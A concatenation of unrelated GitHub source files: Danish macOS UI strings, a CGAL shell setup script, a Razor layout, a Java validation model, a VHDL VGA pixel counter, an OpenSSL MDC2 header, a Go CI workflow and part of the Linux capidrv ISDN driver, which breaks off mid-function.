"105.title" = "Sidst opdateret:";
/* Class = "NSButtonCell"; title = "Validate"; ObjectID = "109"; */
"109.title" = "Godkend";
/* Class = "NSTextFieldCell"; title = "User name:"; ObjectID = "111"; */
"111.title" = "Brugernavn:";
/* Class = "NSTextFieldCell"; title = "Password:"; ObjectID = "112"; */
"112.title" = "Kodeord:";
/* Class = "NSButtonCell"; title = "Update Authentication"; ObjectID = "115"; */
"115.title" = "Opdater autorisering";
/* Class = "NSTextFieldCell"; title = "Size:"; ObjectID = "117"; */
"117.title" = "Størrelse:";
/* Class = "NSTextFieldCell"; title = "Unread:"; ObjectID = "118"; */
"118.title" = "Ulæst:";
/* Class = "NSButtonCell"; title = "Subscribed"; ObjectID = "121"; */
"121.title" = "Abonneret";
/* Class = "NSButtonCell"; title = "Load Full HTML Articles"; ObjectID = "126"; */
"126.title" = "Hent fulde HTML-artikler";
/* Class = "NSTextFieldCell"; title = "Description"; ObjectID = "E84-Uo-ybg"; */
"E84-Uo-ybg.title" = "Beskrivelse";
/* Class = "NSTextFieldCell"; title = "General"; ObjectID = "i9j-KH-c3D"; */
"i9j-KH-c3D.title" = "Generelt";
/* Class = "NSTextFieldCell"; title = "Authentication"; ObjectID = "U0N-RF-bUt"; */
"U0N-RF-bUt.title" = "Autorisering";
/* Class = "NSTextFieldCell"; title = "Feed URL"; ObjectID = "xPF-M9-oZG"; */
"xPF-M9-oZG.title" = "Feed-henvisning";
/* Class = "NSButtonCell"; title = "Open Cached File…"; ObjectID = "xTj-hY-aTU"; */
"xTj-hY-aTU.title" = "Åben cachet arkiv…";
| {
"pile_set_name": "Github"
} |
export CGAL_DIR='/cygdrive/c/CGAL/reference_platforms/x64_Cygwin-Windows8_MSVC2010-Release-64bits'
export VC_VERSION="10"
export ARCH="64"
export PLATFORM_REFERENCE="/cygdrive/c/CGAL/reference_platforms"
source "${PLATFORM_REFERENCE}/setup_common"
| {
"pile_set_name": "Github"
} |
<!DOCTYPE html>
<html>
<head>
<base href="/">
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>@ViewBag.Title - @T.Get("common.product")</title>
<environment names="Production">
<link rel="stylesheet" asp-append-version="true" href="@Url.RootContentUrl("~/build/app.css")" />
</environment>
@if (IsSectionDefined("header"))
{
@await RenderSectionAsync("header")
}
</head>
<body class="white">
<div class="profile @ViewBag.Class">
<img class="profile-logo" alt="@T.Get("common.product")S" title="@T.Get("common.product")" src="@Url.RootContentUrl("~/images/logo.svg")" />
@RenderBody()
</div>
<environment names="Development">
<script type="text/javascript" src="https://localhost:3000/shims.js"></script>
<script type="text/javascript" src="https://localhost:3000/app.js"></script>
</environment>
</body>
</html> | {
"pile_set_name": "Github"
} |
package com.uber.rave.model;
import androidx.annotation.NonNull;
import androidx.annotation.Size;
import androidx.annotation.StringDef;
import com.uber.rave.AnnotationSpecs;
import com.uber.rave.ObjectCreator;
import com.uber.rave.ObjectCreatorIncrementer;
import com.uber.rave.StringCreator;
import com.uber.rave.annotation.Validated;
import com.uber.rave.compiler.MyFactory;
import java.lang.annotation.Retention;
import java.lang.annotation.RetentionPolicy;
/**
* A simple example of using RAVE on a model class.
*/
@Validated(factory = MyFactory.class)
public class SingleMethodSampleModel {
public static final String MATCHED1 = "Matched";
public static final String MATCHED2 = "Matching";
public static final String MATCHED3 = "AlsoMatching";
@StringDef({MATCHED1, MATCHED2, MATCHED3})
@Retention(RetentionPolicy.SOURCE)
@interface TestStringDef { }
private String notNullField;
private String matchStringDef;
public SingleMethodSampleModel(String notNullField, String matchStringDef) {
this.notNullField = notNullField;
this.matchStringDef = matchStringDef;
}
/**
* @return An example method using the size annotation.
*/
@Size(min = 1, max = 20, multiple = 2)
@NonNull
public String getNotNullField() {
return notNullField;
}
@TestStringDef
@NonNull
public String getMatchStringDef() {
return matchStringDef;
}
public static class Builder extends ObjectCreator<SingleMethodSampleModel> {
ObjectCreatorIncrementer incrementer;
private final StringCreator notNullStringCreator = new StringCreator(1, 20, 2, false);
private final StringCreator matchStringDefStringCreator;
public Builder() {
AnnotationSpecs spec = new AnnotationSpecs.Builder()
.setIsNullable(false)
.setStringDef(MATCHED1, MATCHED2, MATCHED3)
.build();
matchStringDefStringCreator = new StringCreator(spec);
incrementer = new ObjectCreatorIncrementer(notNullStringCreator, matchStringDefStringCreator);
buildValidCases();
buildInvalidCases();
}
private void buildValidCases() {
while (incrementer.hasValidPermutations()) {
addValidType(new SingleMethodSampleModel(notNullStringCreator.getValidItem(),
matchStringDefStringCreator.getValidItem()));
incrementer.incrementValidCreators();
}
}
private void buildInvalidCases() {
while (incrementer.hasInvalidPermutations()) {
addInvalidType(new SingleMethodSampleModel(notNullStringCreator.getInvalidItem(),
matchStringDefStringCreator.getInvalidItem()));
incrementer.incrementInvalidCreators();
}
}
}
}
| {
"pile_set_name": "Github"
} |
library ieee;
use ieee.std_logic_1164.all;
use ieee.numeric_std_unsigned.all;
-- This module generates the pixel coordinates
-- for a 640x480 @ 60 Hz screen resolution.
-- This module expects an input clock frequency
-- of 25.175 MHz, but will work fine with 25.0 MHz.
entity pix is
port (
clk_i : in std_logic;
-- Pixel counters
pix_x_o : out std_logic_vector(9 downto 0);
pix_y_o : out std_logic_vector(9 downto 0)
);
end pix;
architecture structural of pix is
-- Define constants used for 640x480 @ 60 Hz.
-- Requires a clock of 25.175 MHz.
-- See page 17 in "VESA MONITOR TIMING STANDARD"
-- http://caxapa.ru/thumbs/361638/DMTv1r11.pdf
constant H_TOTAL : integer := 800;
constant V_TOTAL : integer := 525;
-- Pixel counters
signal pix_x : std_logic_vector(9 downto 0) := (others => '0');
signal pix_y : std_logic_vector(9 downto 0) := (others => '0');
begin
--------------------------------------------------
-- Generate horizontal and vertical pixel counters
--------------------------------------------------
pix_x_proc : process (clk_i)
begin
if rising_edge(clk_i) then
if pix_x = H_TOTAL-1 then
pix_x <= (others => '0');
else
pix_x <= pix_x + 1;
end if;
end if;
end process pix_x_proc;
pix_y_proc : process (clk_i)
begin
if rising_edge(clk_i) then
if pix_x = H_TOTAL-1 then
if pix_y = V_TOTAL-1 then
pix_y <= (others => '0');
else
pix_y <= pix_y + 1;
end if;
end if;
end if;
end process pix_y_proc;
------------------------
-- Drive output signals
------------------------
pix_x_o <= pix_x;
pix_y_o <= pix_y;
end architecture structural;
| {
"pile_set_name": "Github"
} |
/* crypto/mdc2/mdc2.h */
/* Copyright (C) 1995-1998 Eric Young ([email protected])
* All rights reserved.
*
* This package is an SSL implementation written
* by Eric Young ([email protected]).
* The implementation was written so as to conform with Netscapes SSL.
*
* This library is free for commercial and non-commercial use as long as
* the following conditions are aheared to. The following conditions
* apply to all code found in this distribution, be it the RC4, RSA,
* lhash, DES, etc., code; not just the SSL code. The SSL documentation
* included with this distribution is covered by the same copyright terms
* except that the holder is Tim Hudson ([email protected]).
*
* Copyright remains Eric Young's, and as such any Copyright notices in
* the code are not to be removed.
* If this package is used in a product, Eric Young should be given attribution
* as the author of the parts of the library used.
* This can be in the form of a textual message at program startup or
* in documentation (online or textual) provided with the package.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* 3. All advertising materials mentioning features or use of this software
* must display the following acknowledgement:
* "This product includes cryptographic software written by
* Eric Young ([email protected])"
* The word 'cryptographic' can be left out if the rouines from the library
* being used are not cryptographic related :-).
* 4. If you include any Windows specific code (or a derivative thereof) from
* the apps directory (application code) you must include an acknowledgement:
* "This product includes software written by Tim Hudson ([email protected])"
*
* THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
* The licence and distribution terms for any publically available version or
* derivative of this code cannot be changed. i.e. this code cannot simply be
* copied and put under another distribution licence
* [including the GNU Public Licence.]
*/
#ifndef HEADER_MDC2_H
#define HEADER_MDC2_H
#include <openssl/des.h>
#ifdef __cplusplus
extern "C" {
#endif
#ifdef NO_MDC2
#error MDC2 is disabled.
#endif
#define MDC2_BLOCK 8
#define MDC2_DIGEST_LENGTH 16
typedef struct mdc2_ctx_st
{
int num;
unsigned char data[MDC2_BLOCK];
des_cblock h,hh;
int pad_type; /* either 1 or 2, default 1 */
} MDC2_CTX;
void MDC2_Init(MDC2_CTX *c);
void MDC2_Update(MDC2_CTX *c, const unsigned char *data, unsigned long len);
void MDC2_Final(unsigned char *md, MDC2_CTX *c);
unsigned char *MDC2(const unsigned char *d, unsigned long n,
unsigned char *md);
#ifdef __cplusplus
}
#endif
#endif
| {
"pile_set_name": "Github"
} |
name: test_backend
on:
push:
branches:
tags:
paths:
- '.github/workflows/ci-test-backend.yml'
- 'backend/**'
- '!backend/scripts/**'
pull_request:
paths:
- '.github/workflows/ci-test-backend.yml'
- 'backend/**'
- '!backend/scripts/**'
jobs:
backend:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v2
- name: debug if needed
run: if [[ "$DEBUG" == "true" ]]; then env; fi
env:
DEBUG: ${{secrets.DEBUG}}
- name: install go
uses: actions/setup-go@v1
with:
go-version: 1.14
- name: install golangci-lint and goveralls
run: |
curl -sfL https://raw.githubusercontent.com/golangci/golangci-lint/master/install.sh| sh -s -- -b $GITHUB_WORKSPACE v1.26.0
go get -u github.com/mattn/goveralls
- name: test and lint backend
run: |
go test -race -timeout=60s -covermode=atomic -coverprofile=$GITHUB_WORKSPACE/profile.cov_tmp ./...
cat $GITHUB_WORKSPACE/profile.cov_tmp | grep -v "_mock.go" > $GITHUB_WORKSPACE/profile.cov
$GITHUB_WORKSPACE/golangci-lint --config ${GITHUB_WORKSPACE}/backend/.golangci.yml run --out-format=github-actions ./...
working-directory: backend/app
env:
GOFLAGS: "-mod=vendor"
TZ: "America/Chicago"
- name: test and lint examples
run: |
go version
$GITHUB_WORKSPACE/golangci-lint version
go test -race ./...
$GITHUB_WORKSPACE/golangci-lint --config ${GITHUB_WORKSPACE}/backend/.golangci.yml run --out-format=github-actions ./...
working-directory: backend/_example/memory_store
env:
TZ: "America/Chicago"
- name: submit coverage
run: $(go env GOPATH)/bin/goveralls -service="github" -coverprofile=$GITHUB_WORKSPACE/profile.cov
working-directory: backend
env:
COVERALLS_TOKEN: ${{ secrets.GITHUB_TOKEN }}
| {
"pile_set_name": "Github"
} |
/* $Id: capidrv.c,v 1.1.2.2 2004/01/12 23:17:24 keil Exp $
*
* ISDN4Linux Driver, using capi20 interface (kernelcapi)
*
* Copyright 1997 by Carsten Paeth <[email protected]>
*
* This software may be used and distributed according to the terms
* of the GNU General Public License, incorporated herein by reference.
*
*/
#include <linux/module.h>
#include <linux/errno.h>
#include <linux/kernel.h>
#include <linux/major.h>
#include <linux/slab.h>
#include <linux/fcntl.h>
#include <linux/fs.h>
#include <linux/signal.h>
#include <linux/mm.h>
#include <linux/timer.h>
#include <linux/wait.h>
#include <linux/skbuff.h>
#include <linux/isdn.h>
#include <linux/isdnif.h>
#include <linux/proc_fs.h>
#include <linux/seq_file.h>
#include <linux/capi.h>
#include <linux/kernelcapi.h>
#include <linux/ctype.h>
#include <linux/init.h>
#include <linux/moduleparam.h>
#include <linux/isdn/capiutil.h>
#include <linux/isdn/capicmd.h>
#include "capidrv.h"
static int debugmode = 0;
MODULE_DESCRIPTION("CAPI4Linux: Interface to ISDN4Linux");
MODULE_AUTHOR("Carsten Paeth");
MODULE_LICENSE("GPL");
module_param(debugmode, uint, S_IRUGO | S_IWUSR);
/* -------- type definitions ----------------------------------------- */
struct capidrv_contr {
struct capidrv_contr *next;
struct module *owner;
u32 contrnr;
char name[20];
/*
* for isdn4linux
*/
isdn_if interface;
int myid;
/*
* LISTEN state
*/
int state;
u32 cipmask;
u32 cipmask2;
struct timer_list listentimer;
/*
* ID of capi message sent
*/
u16 msgid;
/*
* B-Channels
*/
int nbchan;
struct capidrv_bchan {
struct capidrv_contr *contr;
u8 msn[ISDN_MSNLEN];
int l2;
int l3;
u8 num[ISDN_MSNLEN];
u8 mynum[ISDN_MSNLEN];
int si1;
int si2;
int incoming;
int disconnecting;
struct capidrv_plci {
struct capidrv_plci *next;
u32 plci;
u32 ncci; /* ncci for CONNECT_ACTIVE_IND */
u16 msgid; /* to identfy CONNECT_CONF */
int chan;
int state;
int leasedline;
struct capidrv_ncci {
struct capidrv_ncci *next;
struct capidrv_plci *plcip;
u32 ncci;
u16 msgid; /* to identfy CONNECT_B3_CONF */
int chan;
int state;
int oldstate;
/* */
u16 datahandle;
struct ncci_datahandle_queue {
struct ncci_datahandle_queue *next;
u16 datahandle;
int len;
} *ackqueue;
} *ncci_list;
} *plcip;
struct capidrv_ncci *nccip;
} *bchans;
struct capidrv_plci *plci_list;
/* for q931 data */
u8 q931_buf[4096];
u8 *q931_read;
u8 *q931_write;
u8 *q931_end;
};
struct capidrv_data {
struct capi20_appl ap;
int ncontr;
struct capidrv_contr *contr_list;
};
typedef struct capidrv_plci capidrv_plci;
typedef struct capidrv_ncci capidrv_ncci;
typedef struct capidrv_contr capidrv_contr;
typedef struct capidrv_data capidrv_data;
typedef struct capidrv_bchan capidrv_bchan;
/* -------- data definitions ----------------------------------------- */
static capidrv_data global;
static DEFINE_SPINLOCK(global_lock);
static void handle_dtrace_data(capidrv_contr *card,
int send, int level2, u8 *data, u16 len);
/* -------- convert functions ---------------------------------------- */
static inline u32 b1prot(int l2, int l3)
{
switch (l2) {
case ISDN_PROTO_L2_X75I:
case ISDN_PROTO_L2_X75UI:
case ISDN_PROTO_L2_X75BUI:
return 0;
case ISDN_PROTO_L2_HDLC:
default:
return 0;
case ISDN_PROTO_L2_TRANS:
return 1;
case ISDN_PROTO_L2_V11096:
case ISDN_PROTO_L2_V11019:
case ISDN_PROTO_L2_V11038:
return 2;
case ISDN_PROTO_L2_FAX:
return 4;
case ISDN_PROTO_L2_MODEM:
return 8;
}
}
static inline u32 b2prot(int l2, int l3)
{
switch (l2) {
case ISDN_PROTO_L2_X75I:
case ISDN_PROTO_L2_X75UI:
case ISDN_PROTO_L2_X75BUI:
default:
return 0;
case ISDN_PROTO_L2_HDLC:
case ISDN_PROTO_L2_TRANS:
case ISDN_PROTO_L2_V11096:
case ISDN_PROTO_L2_V11019:
case ISDN_PROTO_L2_V11038:
case ISDN_PROTO_L2_MODEM:
return 1;
case ISDN_PROTO_L2_FAX:
return 4;
}
}
static inline u32 b3prot(int l2, int l3)
{
switch (l2) {
case ISDN_PROTO_L2_X75I:
case ISDN_PROTO_L2_X75UI:
case ISDN_PROTO_L2_X75BUI:
case ISDN_PROTO_L2_HDLC:
case ISDN_PROTO_L2_TRANS:
case ISDN_PROTO_L2_V11096:
case ISDN_PROTO_L2_V11019:
case ISDN_PROTO_L2_V11038:
case ISDN_PROTO_L2_MODEM:
default:
return 0;
case ISDN_PROTO_L2_FAX:
return 4;
}
}
static _cstruct b1config_async_v110(u16 rate)
{
/* CAPI-Spec "B1 Configuration" */
static unsigned char buf[9];
buf[0] = 8; /* len */
/* maximum bitrate */
buf[1] = rate & 0xff; buf[2] = (rate >> 8) & 0xff;
buf[3] = 8; buf[4] = 0; /* 8 bits per character */
buf[5] = 0; buf[6] = 0; /* parity none */
buf[7] = 0; buf[8] = 0; /* 1 stop bit */
return buf;
}
static _cstruct b1config(int l2, int l3)
{
switch (l2) {
case ISDN_PROTO_L2_X75I:
case ISDN_PROTO_L2_X75UI:
case ISDN_PROTO_L2_X75BUI:
case ISDN_PROTO_L2_HDLC:
case ISDN_PROTO_L2_TRANS:
default:
return NULL;
case ISDN_PROTO_L2_V11096:
return b1config_async_v110(9600);
case ISDN_PROTO_L2_V11019:
return b1config_async_v110(19200);
case ISDN_PROTO_L2_V11038:
return b1config_async_v110(38400);
}
}
static inline u16 si2cip(u8 si1, u8 si2)
{
static const u8 cip[17][5] =
{
/* 0 1 2 3 4 */
{0, 0, 0, 0, 0}, /*0 */
{16, 16, 4, 26, 16}, /*1 */
{17, 17, 17, 4, 4}, /*2 */
{2, 2, 2, 2, 2}, /*3 */
{18, 18, 18, 18, 18}, /*4 */
{2, 2, 2, 2, 2}, /*5 */
{0, 0, 0, 0, 0}, /*6 */
{2, 2, 2, 2, 2}, /*7 */
{2, 2, 2, 2, 2}, /*8 */
{21, 21, 21, 21, 21}, /*9 */
{19, 19, 19, 19, 19}, /*10 */
{0, 0, 0, 0, 0}, /*11 */
{0, 0, 0, 0, 0}, /*12 */
{0, 0, 0, 0, 0}, /*13 */
{0, 0, 0, 0, 0}, /*14 */
{22, 22, 22, 22, 22}, /*15 */
{27, 27, 27, 28, 27} /*16 */
};
if (si1 > 16)
si1 = 0;
if (si2 > 4)
si2 = 0;
return (u16) cip[si1][si2];
}
static inline u8 cip2si1(u16 cipval)
{
static const u8 si[32] =
{7, 1, 7, 7, 1, 1, 7, 7, /*0-7 */
7, 1, 0, 0, 0, 0, 0, 0, /*8-15 */
1, 2, 4, 10, 9, 9, 15, 7, /*16-23 */
7, 7, 1, 16, 16, 0, 0, 0}; /*24-31 */
if (cipval > 31)
cipval = 0; /* .... */
return si[cipval];
}
static inline u8 cip2si2(u16 cipval)
{
static const u8 si[32] =
{0, 0, 0, 0, 2, 3, 0, 0, /*0-7 */
0, 3, 0, 0, 0, 0, 0, 0, /*8-15 */
1, 2, 0, 0, 9, 0, 0, 0, /*16-23 */
0, 0, 3, 2, 3, 0, 0, 0}; /*24-31 */
if (cipval > 31)
cipval = 0; /* .... */
return si[cipval];
}
/* -------- controller management ------------------------------------- */
static inline capidrv_contr *findcontrbydriverid(int driverid)
{
unsigned long flags;
capidrv_contr *p;
spin_lock_irqsave(&global_lock, flags);
for (p = global.contr_list; p; p = p->next)
if (p->myid == driverid)
break;
spin_unlock_irqrestore(&global_lock, flags);
return p;
}
static capidrv_contr *findcontrbynumber(u32 contr)
{
unsigned long flags;
capidrv_contr *p = global.contr_list;
spin_lock_irqsave(&global_lock, flags);
for (p = global.contr_list; p; p = p->next)
if (p->contrnr == contr)
break;
spin_unlock_irqrestore(&global_lock, flags);
return p;
}
/* -------- plci management ------------------------------------------ */
static capidrv_plci *new_plci(capidrv_contr *card, int chan)
{
capidrv_plci *plcip;
plcip = kzalloc(sizeof(capidrv_plci), GFP_ATOMIC);
if (plcip == NULL)
return NULL;
plcip->state = ST_PLCI_NONE;
plcip->plci = 0;
plcip->msgid = 0;
plcip->chan = chan;
plcip->next = card->plci_list;
card->plci_list = plcip;
card->bchans[chan].plcip = plcip;
return plcip;
}
static capidrv_plci *find_plci_by_plci(capidrv_contr *card, u32 plci)
{
capidrv_plci *p;
for (p = card->plci_list; p; p = p->next)
if (p->plci == plci)
return p;
return NULL;
}
static capidrv_plci *find_plci_by_msgid(capidrv_contr *card, u16 msgid)
{
capidrv_plci *p;
for (p = card->plci_list; p; p = p->next)
if (p->msgid == msgid)
return p;
return NULL;
}
static capidrv_plci *find_plci_by_ncci(capidrv_contr *card, u32 ncci)
{
capidrv_plci *p;
for (p = card->plci_list; p; p = p->next)
if (p->plci == (ncci & 0xffff))
return p;
return NULL;
}
static void free_plci(capidrv_contr *card, capidrv_plci *plcip)
{
capidrv_plci **pp;
for (pp = &card->plci_list; *pp; pp = &(*pp)->next) {
if (*pp == plcip) {
*pp = (*pp)->next;
card->bchans[plcip->chan].plcip = NULL;
card->bchans[plcip->chan].disconnecting = 0;
card->bchans[plcip->chan].incoming = 0;
kfree(plcip);
return;
}
}
printk(KERN_ERR "capidrv-%d: free_plci %p (0x%x) not found, Huh?\n",
card->contrnr, plcip, plcip->plci);
}
/* -------- ncci management ------------------------------------------ */
static inline capidrv_ncci *new_ncci(capidrv_contr *card,
capidrv_plci *plcip,
u32 ncci)
{
capidrv_ncci *nccip;
nccip = kzalloc(sizeof(capidrv_ncci), GFP_ATOMIC);
if (nccip == NULL)
return NULL;
nccip->ncci = ncci;
nccip->state = ST_NCCI_NONE;
nccip->plcip = plcip;
nccip->chan = plcip->chan;
nccip->datahandle = 0;
nccip->next = plcip->ncci_list;
plcip->ncci_list = nccip;
card->bchans[plcip->chan].nccip = nccip;
return nccip;
}
static inline capidrv_ncci *find_ncci(capidrv_contr *card, u32 ncci)
{
capidrv_plci *plcip;
capidrv_ncci *p;
if ((plcip = find_plci_by_ncci(card, ncci)) == NULL)
return NULL;
for (p = plcip->ncci_list; p; p = p->next)
if (p->ncci == ncci)
return p;
return NULL;
}
static inline capidrv_ncci *find_ncci_by_msgid(capidrv_contr *card,
u32 ncci, u16 msgid)
{
capidrv_plci *plcip;
capidrv_ncci *p;
if ((plcip = find_plci_by_ncci(card, ncci)) == NULL)
return NULL;
for (p = plcip->ncci_list; p; p = p->next)
if (p->msgid == msgid)
return p;
return NULL;
}
static void free_ncci(capidrv_contr *card, struct capidrv_ncci *nccip)
{
struct capidrv_ncci **pp;
for (pp = &(nccip->plcip->ncci_list); *pp; pp = &(*pp)->next) {
if (*pp == nccip) {
*pp = (*pp)->next;
break;
}
}
card->bchans[nccip->chan].nccip = NULL;
kfree(nccip);
}
static int capidrv_add_ack(struct capidrv_ncci *nccip,
u16 datahandle, int len)
{
struct ncci_datahandle_queue *n, **pp;
n = (struct ncci_datahandle_queue *)
kmalloc(sizeof(struct ncci_datahandle_queue), GFP_ATOMIC);
if (!n) {
printk(KERN_ERR "capidrv: kmalloc ncci_datahandle failed\n");
return -1;
}
n->next = NULL;
n->datahandle = datahandle;
n->len = len;
for (pp = &nccip->ackqueue; *pp; pp = &(*pp)->next);
*pp = n;
return 0;
}
static int capidrv_del_ack(struct capidrv_ncci *nccip, u16 datahandle)
{
struct ncci_datahandle_queue **pp, *p;
int len;
for (pp = &nccip->ackqueue; *pp; pp = &(*pp)->next) {
if ((*pp)->datahandle == datahandle) {
p = *pp;
len = p->len;
*pp = (*pp)->next;
kfree(p);
return len;
}
}
return -1;
}
/* -------- convert and send capi message ---------------------------- */
static void send_message(capidrv_contr *card, _cmsg *cmsg)
{
struct sk_buff *skb;
size_t len;
capi_cmsg2message(cmsg, cmsg->buf);
len = CAPIMSG_LEN(cmsg->buf);
skb = alloc_skb(len, GFP_ATOMIC);
if (!skb) {
printk(KERN_ERR "capidrv::send_message: can't allocate mem\n");
return;
}
memcpy(skb_put(skb, len), cmsg->buf, len);
if (capi20_put_message(&global.ap, skb) != CAPI_NOERROR)
kfree_skb(skb);
}
/* -------- state machine -------------------------------------------- */
struct listenstatechange {
int actstate;
int nextstate;
int event;
};
static struct listenstatechange listentable[] =
{
{ST_LISTEN_NONE, ST_LISTEN_WAIT_CONF, EV_LISTEN_REQ},
{ST_LISTEN_ACTIVE, ST_LISTEN_ACTIVE_WAIT_CONF, EV_LISTEN_REQ},
{ST_LISTEN_WAIT_CONF, ST_LISTEN_NONE, EV_LISTEN_CONF_ERROR},
{ST_LISTEN_ACTIVE_WAIT_CONF, ST_LISTEN_ACTIVE, EV_LISTEN_CONF_ERROR},
{ST_LISTEN_WAIT_CONF, ST_LISTEN_NONE, EV_LISTEN_CONF_EMPTY},
{ST_LISTEN_ACTIVE_WAIT_CONF, ST_LISTEN_NONE, EV_LISTEN_CONF_EMPTY},
{ST_LISTEN_WAIT_CONF, ST_LISTEN_ACTIVE, EV_LISTEN_CONF_OK},
{ST_LISTEN_ACTIVE_WAIT_CONF, ST_LISTEN_ACTIVE, EV_LISTEN_CONF_OK},
{},
};
static void listen_change_state(capidrv_contr *card, int event)
{
struct listenstatechange *p = listentable;
while (p->event) {
if (card->state == p->actstate && p->event == event) {
if (debugmode)
printk(KERN_DEBUG "capidrv-%d: listen_change_state %d -> %d\n",
card->contrnr, card->state, p->nextstate);
card->state = p->nextstate;
return;
}
p++;
}
printk(KERN_ERR "capidrv-%d: listen_change_state state=%d event=%d ????\n",
card->contrnr, card->state, event);
}
/* ------------------------------------------------------------------ */
static void p0(capidrv_contr *card, capidrv_plci *plci)
{
isdn_ctrl cmd;
card->bchans[plci->chan].contr = NULL;
cmd.command = ISDN_STAT_DHUP;
cmd.driver = card->myid;
cmd.arg = plci->chan;
card->interface.statcallb(&cmd);
free_plci(card, plci);
}
/* ------------------------------------------------------------------ */
struct plcistatechange {
int actstate;
int nextstate;
int event;
void (*changefunc)(capidrv_contr *card, capidrv_plci *plci);
};
static struct plcistatechange plcitable[] =
{
/* P-0 */
{ST_PLCI_NONE, ST_PLCI_OUTGOING, EV_PLCI_CONNECT_REQ, NULL},
{ST_PLCI_NONE, ST_PLCI_ALLOCATED, EV_PLCI_FACILITY_IND_UP, NULL},
{ST_PLCI_NONE, ST_PLCI_INCOMING, EV_PLCI_CONNECT_IND, NULL},
{ST_PLCI_NONE, ST_PLCI_RESUMEING, EV_PLCI_RESUME_REQ, NULL},
/* P-0.1 */
{ST_PLCI_OUTGOING, ST_PLCI_NONE, EV_PLCI_CONNECT_CONF_ERROR, p0},
{ST_PLCI_OUTGOING, ST_PLCI_ALLOCATED, EV_PLCI_CONNECT_CONF_OK, NULL},
/* P-1 */
{ST_PLCI_ALLOCATED, ST_PLCI_ACTIVE, EV_PLCI_CONNECT_ACTIVE_IND, NULL},
{ST_PLCI_ALLOCATED, ST_PLCI_DISCONNECTING, EV_PLCI_DISCONNECT_REQ, NULL},
{ST_PLCI_ALLOCATED, ST_PLCI_DISCONNECTING, EV_PLCI_FACILITY_IND_DOWN, NULL},
{ST_PLCI_ALLOCATED, ST_PLCI_DISCONNECTED, EV_PLCI_DISCONNECT_IND, NULL},
/* P-ACT */
{ST_PLCI_ACTIVE, ST_PLCI_DISCONNECTING, EV_PLCI_DISCONNECT_REQ, NULL},
{ST_PLCI_ACTIVE, ST_PLCI_DISCONNECTING, EV_PLCI_FACILITY_IND_DOWN, NULL},
{ST_PLCI_ACTIVE, ST_PLCI_DISCONNECTED, EV_PLCI_DISCONNECT_IND, NULL},
{ST_PLCI_ACTIVE, ST_PLCI_HELD, EV_PLCI_HOLD_IND, NULL},
{ST_PLCI_ACTIVE, ST_PLCI_DISCONNECTING, EV_PLCI_SUSPEND_IND, NULL},
/* P-2 */
{ST_PLCI_INCOMING, ST_PLCI_DISCONNECTING, EV_PLCI_CONNECT_REJECT, NULL},
{ST_PLCI_INCOMING, ST_PLCI_FACILITY_IND, EV_PLCI_FACILITY_IND_UP, NULL},
{ST_PLCI_INCOMING, ST_PLCI_ACCEPTING, EV_PLCI_CONNECT_RESP, NULL},
{ST_PLCI_INCOMING, ST_PLCI_DISCONNECTING, EV_PLCI_DISCONNECT_REQ, NULL},
{ST_PLCI_INCOMING, ST_PLCI_DISCONNECTING, EV_PLCI_FACILITY_IND_DOWN, NULL},
{ST_PLCI_INCOMING, ST_PLCI_DISCONNECTED, EV_PLCI_DISCONNECT_IND, NULL},
{ST_PLCI_INCOMING, ST_PLCI_DISCONNECTING, EV_PLCI_CD_IND, NULL},
/* P-3 */
{ST_PLCI_FACILITY_IND, ST_PLCI_DISCONNECTING, EV_PLCI_CONNECT_REJECT, NULL},
{ST_PLCI_FACILITY_IND, ST_PLCI_ACCEPTING, EV_PLCI_CONNECT_ACTIVE_IND, NULL},
{ST_PLCI_FACILITY_IND, ST_PLCI_DISCONNECTING, EV_PLCI_DISCONNECT_REQ, NULL},
{ST_PLCI_FACILITY_IND, ST_PLCI_DISCONNECTING, EV_PLCI_FACILITY_IND_DOWN, NULL},
{ST_PLCI_FACILITY_IND, ST_PLCI_DISCONNECTED, EV_PLCI_DISCONNECT_IND, NULL},
/* P-4 */
{ST_PLCI_ACCEPTING, ST_PLCI_ACTIVE, EV_PLCI_CONNECT_ACTIVE_IND, NULL},
{ST_PLCI_ACCEPTING, ST_PLCI_DISCONNECTING, EV_PLCI_DISCONNECT_REQ, NULL},
{ST_PLCI_ACCEPTING, ST_PLCI_DISCONNECTING, EV_PLCI_FACILITY_IND_DOWN, NULL},
{ST_PLCI_ACCEPTING, ST_PLCI_DISCONNECTED, EV_PLCI_DISCONNECT_IND, NULL},
/* P-5 */
{ST_PLCI_DISCONNECTING, ST_PLCI_DISCONNECTED, EV_PLCI_DISCONNECT_IND, NULL},
/* P-6 */
{ST_PLCI_DISCONNECTED, ST_PLCI_NONE, EV_PLCI_DISCONNECT_RESP, p0},
/* P-0.Res */
{ST_PLCI_RESUMEING, ST_PLCI_NONE, EV_PLCI_RESUME_CONF_ERROR, p0},
{ST_PLCI_RESUMEING, ST_PLCI_RESUME, EV_PLCI_RESUME_CONF_OK, NULL},
/* P-RES */
{ST_PLCI_RESUME, ST_PLCI_ACTIVE, EV_PLCI_RESUME_IND, NULL},
/* P-HELD */
{ST_PLCI_HELD, ST_PLCI_ACTIVE, EV_PLCI_RETRIEVE_IND, NULL},
{},
};
static void plci_change_state(capidrv_contr *card, capidrv_plci *plci, int event)
{
struct plcistatechange *p = plcitable;
